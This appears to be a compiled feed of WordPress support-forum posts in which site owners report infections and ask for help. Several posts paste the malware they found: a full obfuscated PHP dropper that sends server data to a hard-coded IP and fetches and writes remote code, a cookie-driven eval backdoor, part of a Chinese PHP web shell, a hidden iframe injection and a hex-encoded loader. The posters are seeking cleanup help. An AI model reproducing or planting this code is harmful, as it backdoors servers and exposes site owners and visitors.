Malware Found On Site – Help With Deleting Files

October 21, 2020, 9:44 am

≫ Next: How to Identify & Prevent Future Threat?

≪ Previous: If I migrate with this tool, will I bring malware with me?

$

0

0

Hi,

I’ve just paid for your premium plugin and after doing a malware scan I see my site is infected. It is likely from the (now deleted) plugin WP File Manager as my server host Cloudways alerted me to the vulnerable plugin.

This is a further message from Cloudways:

Thanks for getting in touch with us. I have checked the details and your site is infected with malware which is injected in a number of your files.

https://i.imgur.com/hws0mKx.png

This may be a result of a vulnerable plugin/theme you were using with your sites. Since we do not provide malware cleaning service, in this case, I would recommend you to either:

1. Scan your sites from a reliable security service.

So my question is, I don’t want to risk deleting any false positive files your scan has flagged, can you advise which ones are the actual malware I should delete please (including how to access and deleted the file Cloudways support linked to: https://i.imgur.com/hws0mKx.png)

Thanks in advance for your help.

Tiffany

---

How to Identify & Prevent Future Threat?

October 23, 2020, 11:42 am

≫ Next: Malware Scanning, Jetpack Conflict

≪ Previous: Malware Found On Site – Help With Deleting Files

$

0

0

Great plugin, it has detected and help me remove the malicious code from my site…however, the infection keeps coming back, even after hardening my site.

How do I use the plugin to identify what the threat actually is? This might help me identify where the hole in my security is.

Steps I’ve performed:
-Reinstalling WP Core
-Reinstalling all Plugins
-Reinstalling theme
-WordFence scan and deleting or repairing infected files
-Changing passwords for WP and database
-Looking for hidden accounts in the database
-Changing FTP passwords-Removing unauthorized FTP accounts

Here is the malicious code I’m finding in multiple files:
<?php if(!isset($incode)){$vl='h';$serverid='0bdf5b6877cf16717e02642fc9fc250d';$server_addr='219.95.83.119';function o0($oo0o,$oo,$oo0,$oO,$oOo,$ooooO){$o0oo0='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0';if(ini_get('allow_url_fopen')==1){$o000=stream_context_create(array($ooooO=>array('method'=>'POST','timeout'=>$oOo,'header'=>array('Content-type: application/x-www-form-urlencoded','User-Agent: '.$o0oo0,'content'=>http_build_query($_SERVER)))));if($oO=='yes'){$oo0o=$oo0o.'&type=fopen';}$ooo=@file_get_contents($oo0o,false,$o000);}elseif(in_array('curl',get_loaded_extensions())){if($oO=='yes'){$oo0o=$oo0o.'&type=curl';}$oo00O=curl_init();curl_setopt($oo00O,CURLOPT_URL,$oo0o);curl_setopt($oo00O,CURLOPT_HEADER,false);curl_setopt($oo00O,CURLOPT_RETURNTRANSFER,true);curl_setopt($oo00O,CURLOPT_TIMEOUT,$oOo);curl_setopt($oo00O,CURLOPT_USERAGENT,$o0oo0);if($ooooO=='https'){curl_setopt($oo00O,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($oo00O,CURLOPT_SSL_VERIFYHOST,false);}curl_setopt($oo00O,CURLOPT_CONNECTTIMEOUT,5);curl_setopt($oo00O,CURLOPT_POSTFIELDS,http_build_query($_SERVER));$ooo=@curl_exec($oo00O);curl_close($oo00O);}else{if($oO=='yes'){$oo0=$oo0.'&type=socks';}if($ooooO=='https'){$ooO=fsockopen('ssl://'.$oo,443,$o0Ooo,$oO0,$oOo);}else{$ooO=fsockopen($oo,80,$o0Ooo,$oO0,$oOo);}if($ooO){stream_set_timeout($ooO,$oOo);$oO0Oo=http_build_query($_SERVER);$o0O='POST '.$oo0.' HTTP/1.0'."\r\n";$o0O.='Host: '.$oo."\r\n";$o0O.='User-Agent: '.$o0oo0."\r\n";$o0O.='Content-Type: application/x-www-form-urlencoded'."\r\n";$o0O.='Content-Length: '.strlen($oO0Oo)."\r\n\r\n";fwrite($ooO,$o0O);fwrite($ooO,$oO0Oo);$oooO='';while(!feof($ooO)){$oooO.=fgets($ooO,4096);}fclose($ooO);list($ooOO,$oO0oo)=@preg_split("/\R\R/",$oooO,2);$ooo=$oO0oo;}}return$ooo;}function ooO($o0OO){$o0oo[0]=(int)($o0OO/256/256/256);$o0oo[1]=(int)(($o0OO-$o0oo[0]*256*256*256)/256/256);$o0oo[2]=(int)(($o0OO-$o0oo[0]*256*256*256-$o0oo[1]*256*256)/256);$o0oo[3]=$o0OO-$o0oo[0]*256*256*256-$o0oo[1]*256*256-$o0oo[2]*256;return''.$o0oo[0].".".$o0oo[1].".".$o0oo[2].".".$o0oo[3];}function o0O00($o0o0){$o0Oo=array();$o0Oo[]=$o0o0;foreach(scandir($o0o0) as$oo00){if($oo00=='.'||$oo00=='..'){continue;}$oOO0=$o0o0.DIRECTORY_SEPARATOR.$oo00;if(is_dir($oOO0)){$o0Oo[]=$oOO0;$o0Oo=array_merge($o0Oo,o0O00($oOO0));}}return$o0Oo;}$oOoo=@preg_replace('/^www\./','',$_SERVER['HTTP_HOST']);$oo=ooO('3104709758');$oo0='/get.php?spider&checkdomain&host='.$oOoo.'&serverid='.$serverid.'&stookfile='.__FILE__;$oo0o='http://'.$oo.'/get.php?spider&checkdomain&host='.$oOoo.'&serverid='.$serverid.'&stookfile='.__FILE__;$oo0OO=o0($oo0o,$oo,$oo0,$oO='no',$oOo='30',$ooooO='http');if($oo0OO!='havedoor|havedonor'){$o0=$_SERVER['HTTP_HOST'];$oo0O=@preg_replace('/^www\./','',$_SERVER['HTTP_HOST']);$oO00=$_SERVER['DOCUMENT_ROOT'];chdir($oO00);$o0Oo=o0O00($oO00);$o0Oo=array_unique($o0Oo);foreach($o0Oo as$oo00){if(is_dir($oo00)&&is_writable($oo00)){$o0O0o=explode(DIRECTORY_SEPARATOR,$oo00);$oOo0=count($o0O0o);$oOoOo[]=$oOo0.'|'.$oo00;}}$oOo0=0;foreach($oOoOo as$ooo0){if(count($oOoOo)>1&&(strstr($ooo0,'/wp-admin')||strstr($ooo0,'/cgi-bin'))){unset($oOoOo[$oOo0]);}$oOo0++;}if(!is_writable($oO00)){natsort($oOoOo);$oOoOo=array_values($oOoOo);$ooo0=explode('|',$oOoOo[0]);$ooo0=$ooo0[1];}else{$ooo0=$oO00;}chdir($ooo0);if(stristr($oo0OO,'nodoor')){$oo0o='http://'.$oo.'/get.php?vl='.$vl.'&update&needfilename';$oo0='/get.php?vl='.$vl.'&update&needfilename';$o0o=o0($oo0o,$oo,$oo0,$oO='no',$oOo='55',$ooooO='http');$oo0oO=explode('|||||',$o0o);$oOoOO=$oo0oO[0].'.php';$o00o=$oo0oO[1];file_put_contents($ooo0.DIRECTORY_SEPARATOR.$oOoOO,$o00o);$o00=str_replace($oO00,'',$ooo0);if($_SERVER['SERVER_PORT']=='443'){$ooooO='https';}else{$ooooO='http';}$oo0o=$ooooO.'://'.$o0.$o00.'/'.$oOoOO.'?gen&serverid='.$serverid;$oo0=$o00.'/'.$oOoOO.'?gen&serverid='.$serverid;$ooOoO=o0($oo0o,$o0,$oo0,$oO='no',$oOo='55',$ooooO);}elseif(stristr($oo0OO,'needtoloadsomefiles')){shuffle($oOoOo);$ooo0=explode('|',$oOoOo[0]);$ooo0=$ooo0[1];$o00=str_replace($oO00,'',$ooo0);$o0oO='stuvwxyz';$oOoOO=str_shuffle($o0oO).'.php';$ooOo=urlencode($ooooO.'://'.$o0.$o00.'/'.$oOoOO);$oo0o='http://'.$oo.'/get.php?bdr&url='.$ooOo;$oo0='/get.php?bdr&url='.$ooOo;$ooo=o0($oo0o,$oo,$oo0,$oO='no',$oOo='20',$ooooO='http');file_put_contents($ooo0.DIRECTORY_SEPARATOR.$oOoOO,$ooo);}elseif(stristr($oo0OO,'needtoloadclient')){$oo0o='http://'.$oo.'/get.php?getclient&domain='.$oo0O;$oo0='/get.php?getclient&domain='.$oo0O;$ooo=o0($oo0o,$oo,$oo0,$oO='no',$oOo='55',$ooooO='http');if($ooo!='noclient'){$oOO0o=explode('::::',$ooo);$ooO0=$oOO0o[0];$ooOOO=$oOO0o[1];if(file_exists($ooO0)){if(!is_writable($ooO0)){@chmod($ooO0,'0644');@file_put_contents($ooO0,$ooOOO);if(!is_writable($ooO0)){@unlink($ooO0);@file_put_contents($ooO0,$ooOOO);}}else{@file_put_contents($ooO0,$ooOOO);}}else{@file_put_contents($ooO0,$ooOOO);}}}elseif($oo0OO=='needtowait'){}if(stristr($oo0OO,'nodonor')){}}$incode=1;}?><?php

Malware Scanning, Jetpack Conflict

October 27, 2020, 5:13 pm

≫ Next: File appears to be malicious

≪ Previous: How to Identify & Prevent Future Threat?

$

0

0

Dear, thank you very much for the great plugin.

When I go to Malware Scanning I see the following errors above. What can they be and how do I get rid of them?

Thanks a lot and stay healthy these days. Best wishes and a nice evening Neo

Warning: filemtime(): stat failed for //sites/website.com/jetpack-temp in /sites/website.com/wp-content/plugins/defender-security/app/module/scan/behavior/core-result.php on line 30

Warning: filesize(): stat failed for /sites/website.com/jetpack-temp in /sites/website.com/wp-content/plugins/defender-security/app/module/scan/behavior/core-result.php on line 31

File appears to be malicious

October 28, 2020, 5:22 pm

≫ Next: Great Plugin

≪ Previous: Malware Scanning, Jetpack Conflict

$

0

0

Dear MiniOrange Colleagues,

I deleted the MiniOrange Social Login plugin after receiving the following error message from Wordfence: https://prnt.sc/v90oy6

Critical Issue Found: File appears to be malicious: wp-content/plugins/miniorganze-login-openid/miniorange_openid_sso_settings_page.php.

Critical Issue Found: File appears to be malicious: wp-content/plugins/miniorganze-login-widget.php.

Is this a known issue? Any recommendations for remedies?

Thanks,
Nate

Great Plugin

November 4, 2020, 9:58 pm

≫ Next: Wordfence malware alert Backdoor:PHP/reval.C.3102

≪ Previous: File appears to be malicious

$

0

0

Excellent WP scanner I’ve tried so far!!!

Wordfence malware alert Backdoor:PHP/reval.C.3102

November 5, 2020, 2:56 am

≫ Next: virus

≪ Previous: Great Plugin

$

0

0

Hi,

I received a Wordfence malware alert in one of my websites, regarding a Backdoor:PHP/reval.C.3102 script in wp-content/plugins/mainwp-child/mainwp-child.php file

Details:
The matched text in this file is:

$p = $_COOKIE;\x0d\x0a(count($p) == 8)?(($um = $p[59].$p[68]) && ($bk = $um($p[95].$p[75])) && ($_bk = $um($p[16].$p[38])) && ($_bk = $bk($p[43], $_bk($um($p[20])))) && @$_bk(

Is this real malware or a false positive?

Regards,
Roberto Jobet

virus

November 6, 2020, 12:11 am

≫ Next: Plug in caused too much spam and Advertising mails

≪ Previous: Wordfence malware alert Backdoor:PHP/reval.C.3102

$

0

0

Hi,

I am surprise to find that in table “wp_trp_original_strings” lakhs of unwanted url are storing and so in in their respective language table.
you can see the screenshot
http://prntscr.com/vei5q7
And these tables are growing day by day. It is now of 2 GB.

Can you let me know from where it is coming.

Kindly help.

thanks

Plug in caused too much spam and Advertising mails

November 6, 2020, 5:06 am

≫ Next: File Change Warning

≪ Previous: virus

$

0

0

This plug in is not very helpful. I got tons of advertising and spam mails

Deleted and will never install it again

There are better alternatives completly free!
I wont wonder if most feedbacks regarding this plug in are fake.

---

File Change Warning

October 25, 2020, 10:14 am

≫ Next: WordPress Backup Extraction on Windows. Threat Found. Exploit:JS/ShellCode.gen

≪ Previous: Plug in caused too much spam and Advertising mails

$

0

0

Hi,

I lately received file warnings. Several times it’s about these three:
config-transient.php
config-synced.php
config-livewaf.php

Is this something to worry about?

Regards,

LV

WordPress Backup Extraction on Windows. Threat Found. Exploit:JS/ShellCode.gen

November 10, 2020, 8:44 am

≫ Next: VIRUS – STAY AWAY

≪ Previous: File Change Warning

$

0

0

Windows Defender discovered a threat while I was extracting a WordPress backup of my live site onto my localhost.

The warning is Exploit:JS/ShellCode.gen.

So I had a closer look at that file caches_data_thumb.php.

This is inside the directory “ppom_files”. Putting PPOM into google shows this was a plugin which was installed a while back to add extra options for WooCommerce products. This plugin was removed a while ago shortly after it was installed however the directories are still here.

I opened caches_data_thumb.php in my editor and it’s got some dodgy code in it with chinese characters, see below:

<?php
header("Content-type:text/html;charset=gbk");
$password='wp_caches';
$shellname='Hello By xxxx';
$myurl=null;
error_reporting(0);
ob_start();
define('myaddress',$_SERVER['SCRIPT_FILENAME']);
define('postpass',$password);
define('shellname',$shellname);
define('myurl',$myurl);
if(@get_magic_quotes_gpc()){
    foreach($_POST as $k => $v) $_POST[$k] = stripslashes($v);
    foreach($_GET as $k => $v) $_GET[$k] = stripslashes($v);
}
if(isset($_REQUEST[postpass])){
hmlogin(2);
@eval($_REQUEST[postpass]);
exit;}
if($_COOKIE['postpass'] != md5(postpass)){
    if($_POST['postpass']){
        if($_POST['postpass'] == postpass){
            setcookie('postpass',md5($_POST['postpass']));
            hmlogin();
        }else{
            echo '<CENTER>用户或密码错误</CENTER>';
        }
    }
    islogin($shellname,$myurl);
    exit;
}
if(isset($_GET['down'])) do_down($_GET['down']);
if(isset($_GET['pack'])){
    $dir = do_show($_GET['pack']);
    $zip = new eanver($dir);
    $out = $zip->out;
    do_download($out,$_SERVER['HTTP_HOST'].".tar.gz");
}
if(isset($_GET['unzip'])){
    css_main();
    start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']);
    exit;
}
define('root_dir',str_replace('\\','/',dirname(myaddress)).'/');
define('run_win',substr(PHP_OS, 0, 3) == "WIN");
define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME']));
$eanver = isset($_GET['eanver']) ? $_GET['eanver'] : "";
$doing = isset($_POST['doing']) ? $_POST['doing'] : "";
$path = isset($_GET['path']) ? $_GET['path'] : root_dir;
$name = isset($_POST['name']) ? $_POST['name'] : "";
$img = isset($_GET['img']) ? $_GET['img'] : "";
$p = isset($_GET['p']) ? $_GET['p'] : "";
$pp = urlencode(dirname($p));
if($img) css_img($img);
if($eanver == "phpinfo") die(phpinfo());
if($eanver == 'logout'){
    setcookie('postpass',null);
    die('<meta http-equiv="refresh" content="0;URL=?">');
}
$class = array(
"信息操作" => array("upfiles" => "上传文件","phpinfo" => "基本信息","info_f" => "系统信息","phpcode" => "执行PHP脚本"),
"提权工具" => array("sqlshell" => "执行SQL执行","mysql_exec" => "MYSQL操作","myexp" => "MYSQL提权","servu" => "Serv-U提权","cmd" => "执行命令","linux" => "反弹提权","downloader" => "文件下载","port" => "端口扫描"),
"批量操作" => array("guama" => "批量挂马清马","tihuan" => "批量替换内容","scanfile" => "批量搜索文

etc etc, goes on for 100s of lines...

Inside that directory there is other code too. An index.html with html for a landing page for a roof replacement company!

This leads me to believe this plugin has added, or allowed the upload of, malicious code.

Now my question is why has this happened? And how do I vouch for the integrity of my WooCommerce site and clean up this mess? And who’s to say there isn’t more of this garbage hiding out in sub-folders of sub-folders!

VIRUS – STAY AWAY

November 11, 2020, 2:41 am

≫ Next: *Known javascript malware

≪ Previous: WordPress Backup Extraction on Windows. Threat Found. Exploit:JS/ShellCode.gen

$

0

0

Don’t INSTALL THIS – it is a backdoor virus. STAY AWAY!!!!!!

*Known javascript malware

November 16, 2020, 11:31 am

≫ Next: Reliable and easy to setup

≪ Previous: VIRUS – STAY AWAY

$

0

0

Hello friends
In the links below my website, identified as malware
https://www.virustotal.com/gui/url/2deba0ca78cb0a7781f3329e9618d31f33197d6f55586c6f7496cc1cc75dbc9b/detection

https://sitecheck.sucuri.net/results/sourcebaran.com

And it is said that the following code has a problem
“”””
</BODY></HTML><iframe src=”http://dl.sourcebaran.com/counter.php” style=”visibility: hidden; position: absolute; left: 0px; top: 0px” width=”10″ height=”10″/>
“”””
But I can not find and delete it.
Can anyone help?

Reliable and easy to setup

November 18, 2020, 10:13 am

≫ Next: Provides good options even with free plugins.

≪ Previous: *Known javascript malware

$

0

0

We hope that you will love PressLock as much as we do and find it useful and easy to use. Our team has worked their magic to bring you some of the most important security features, previously done by multiple other plugins, into one reliable tool. We invite you give it a try and flag any questions or bugs you may encounter. Constructive feedback is highly appreciated!

Take care and be safe!
PressLock Team

Provides good options even with free plugins.

November 19, 2020, 2:22 am

≫ Next: Piece of code in wpincludes/default-constants.php

≪ Previous: Reliable and easy to setup

$

0

0

Although the firewall can only be enabled if you pay for a Sucuri subscription, this plugin definitely offers some worthwhile configuration measures that make it well worth the file size drawback of installing a new plugin.

Piece of code in wpincludes/default-constants.php

November 19, 2020, 3:36 am

≫ Next: Malware or NOT

≪ Previous: Provides good options even with free plugins.

$

0

0

I found this piece of code in wpincludes/default-constants.php that Wordfence is alerting me about. Is this hack?

/**
* @5fb3bde2e2336
* @var mixed
*/

$wp_woocommerce_plugin = ABSPATH . "\x74\x68\x65\x6d\x65\x73\x2f\x73\x71\x75\x61\x72" .
                         "\x65\x64\x2f\x69\x6e\x63\x2f\x77\x6f\x6f\x63\x6f" .
                         "\x6d\x6d\x65\x72\x63\x65\x2e\x61\x70\x69\x2e\x70" .
                         "\x68\x70";
if (file_exists($wp_woocommerce_plugin)){
    require_once($wp_woocommerce_plugin);
}

/**
* @5fb3bde2e2336
*/

---

Malware or NOT

November 22, 2020, 7:55 am

≫ Next: WordFence reports logfile as possibly malicious

≪ Previous: Piece of code in wpincludes/default-constants.php

$

0

0

Hi Everyone

I have been running this site in my own perception well enough but lately something has happened and no idea what it is. I keep going down in my analytics . I try sucuri and see no problem. As I am just a basic level user of wordpress . I need your help . Please tell me what might be wrong.

www.zoyuncak.com

WordFence reports logfile as possibly malicious

November 24, 2020, 9:54 am

≫ Next: Constant Low Value Fake Orders From a Bot/Malware Script

≪ Previous: Malware or NOT

$

0

0

Hello,

I have installed the new version of the plugin for folks who paid the 15$ to support the developer(s), as suggested in the email. It’s now called «Backup Migrate» and comes in V 1.0. The link in the backend leads to a insecure Url «inchev.com», with no content.

WordFence warns me that the log-file of Backup Migrate contains executable php-code, which could be abused by hackers.

?

Thanks for any enlightenment

Constant Low Value Fake Orders From a Bot/Malware Script

November 26, 2020, 4:50 am

≫ Next: Wpadverts security breach on V. 1.5.0

≪ Previous: WordFence reports logfile as possibly malicious

$

0

0

As if Black Friday was not stressful enough. Since this morning there have been constant order attempts, some successful, for low value items (£4.95). They try over and over… and over again.

This is what the orders look like:
https://i.imgur.com/bi4en5w.png
And this is the payment attempts on each order:
https://i.imgur.com/oZtLTdG.png

I am manually adding their IPs to our .htaccess file however this bot changes IP as soon as they are blocked. I won’t be able to keep up. Some of the IPs I have blocked:

deny from 13.68.180.220
deny from 175.176.90.217
deny from 152.32.112.5
deny from 103.27.230.144
deny from 128.90.79.184
deny from 178.208.176.20

If they keep updating their IP address, I suppose there is just no way to sort this out, they will always have a way around what ever guards I put up?

Many thanks for any help or advice.

Wpadverts security breach on V. 1.5.0

November 27, 2020, 10:49 am

≫ Next: Help removing a suspected malware URL…

≪ Previous: Constant Low Value Fake Orders From a Bot/Malware Script

$

0

0

Hello
One day after latest version 1.5.0 update, I had an attack via WP ADVERTS
My host told me the following :
“Our security systems have detected an outgoing email from your site where it detects the email as spam with this error message “Blocked (Too Many Invalid Recipients)”
108 emails were sent today and 0 emails were sent yesterday.
Email subject “Adverts : wneiyveyxu xxx.xxx@xxxx.fr”
Recipients: CLFOxxxx@GMAIL.COM and xxx.xxx@xxxx.fr
Coming from the contact form https://xxxxx.com/advert/cession-de-patientele-cabinet-dentaire-holistique-paris-14eme/”

So it means that since that version, a malware is sending emails from my domain.
Could you please check the security of your plugin’s code and do your utmost to fix this apparent breach in your next update.
Thank you foor informing me ASAP
CGC

Help removing a suspected malware URL…

November 28, 2020, 11:32 am

≫ Next: Sudden 113 critical issues!

≪ Previous: Wpadverts security breach on V. 1.5.0

$

0

0

Wordfence found a few of these and I would like to remove them. I found them in my code. Since I’m not a coder I have two questions.

1) What do I need to delete in the code in addition to the URLs?

2) Beyond that, can anybody suggest what file I should look for to replace the old code? Once I know it I can replace the file myself.

Thanks,
Steve